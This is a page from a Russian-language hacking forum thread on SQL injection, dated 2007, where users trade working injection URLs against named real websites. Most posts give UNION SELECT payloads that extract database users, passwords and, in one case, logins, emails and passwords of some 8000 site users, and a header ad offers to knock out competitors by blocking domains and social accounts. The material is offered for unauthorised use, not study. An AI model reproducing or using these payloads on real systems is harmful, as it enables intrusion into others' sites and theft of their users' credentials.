SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 44 из 1604

Опции темы

Поиск в этой теме

Опции просмотра

#431

09.02.2007, 05:42

Thanat0z

Постоянный

Регистрация: 06.12.2006

Сообщений: 762

С нами: 10225766

Репутация: 2062

что-то у меня ничего не получается сегодня - неудачные скули, количество подобрал, а селект запрещен, а третий линк просто улыбнул

Код:

http://www.synergisticresearch.com/index.php?PageID=6+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

http://www.e-financialconsulting.com/index.php?p=user&id=-4+union+select+1,2,3,4/*

http://digitalfx.ru/index.php?newsid=1146316404'

#432

09.02.2007, 06:33

ice1k

Постоянный

Регистрация: 01.01.2007

Сообщений: 551

С нами: 10188326

Репутация: 1866

Цитата:

Сообщение от Thanat0z

Код:

http://www.synergisticresearch.com/index.php?PageID=6+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

http://www.e-financialconsulting.com/index.php?p=user&id=-4+union+select+1,2,3,4/*

http://digitalfx.ru/index.php?newsid=1146316404'

Вай селект запрещён?:
http://www.synergisticresearch.com/index.php?PageID=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,user()/*

а http://www.e-financialconsulting.com 4ё-то у меня не грузится вообще =\

#433

09.02.2007, 06:44

GoNZo

Новичок

Регистрация: 17.11.2006

Сообщений: 22

С нами: 10253404

Репутация: 1

Чет немогу понять :/
http://www.nybmwcca.org/events.php?id=-29%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10/*
а вот это ваще хрень
http://www.nybmwcca.org/events.php?id=1+union+select+concat(user,char(58), password)+from%20+mysql.user/*

#434

09.02.2007, 06:52

Thanat0z

Постоянный

Регистрация: 06.12.2006

Сообщений: 762

С нами: 10225766

Репутация: 2062

Цитата:

Сообщение от ice1k

Вай селект запрещён?:
http://www.synergisticresearch.com/index.php?PageID=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,user()/*

хм...я как-то так делал что оно мне говорило

Юзеру такому-то запрешен СЕЛЕКТ с базы.

http://www.synergisticresearch.com/

У тебя конструкция concat(user(),char(58),password()) прошла?

#435

09.02.2007, 10:56

_GaLs_

Постоянный

Регистрация: 21.04.2006

Сообщений: 540

С нами: 10555586

Репутация: 726

_http://www.fhm.com.ua/hospital/?numid=5'
_http://www.fenix.com.ua/pub/view_3x6.php?id=99+union+select+%205,16,17,18,user (1)/*
_http://www.vitrenko.org/start.php?lang=1&part_id=6'
_http://www.nasheradio.net/news2.php?id=22'
_http://bis-el.kiev.ua/index.php?parent_id=0&part_id=1&article_id=224'

#436

09.02.2007, 14:23

Thanat0z

Постоянный

Регистрация: 06.12.2006

Сообщений: 762

С нами: 10225766

Репутация: 2062

Цитата:

Сообщение от _GaLs_

не выкладывай плиз инъекции где нельзя выводить полезную инфу (юзер,пасс), а то и так перебирать много

UPTIME.ru

#437

09.02.2007, 17:24

InferNo23

Участник форума

Регистрация: 05.09.2006

Сообщений: 187

С нами: 10358246

Репутация: 378

UPTIME.ru

UpTime.ru

8000 юзеров..

http://uptime.ru/downtime.php?host_id=-1+union+select+login,2,password,4,email,6,icq,8,9, 10,11,12+from+users+limit+8200,8201/*

#438

09.02.2007, 17:38

InferNo23

Участник форума

Регистрация: 05.09.2006

Сообщений: 187

С нами: 10358246

Репутация: 378

Хостинг RussWeb.ru

http://www.russweb.ru/index.php?sn=rbc47&plan_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25/*

Последний раз редактировалось InferNo23; 09.02.2007 в 17:50..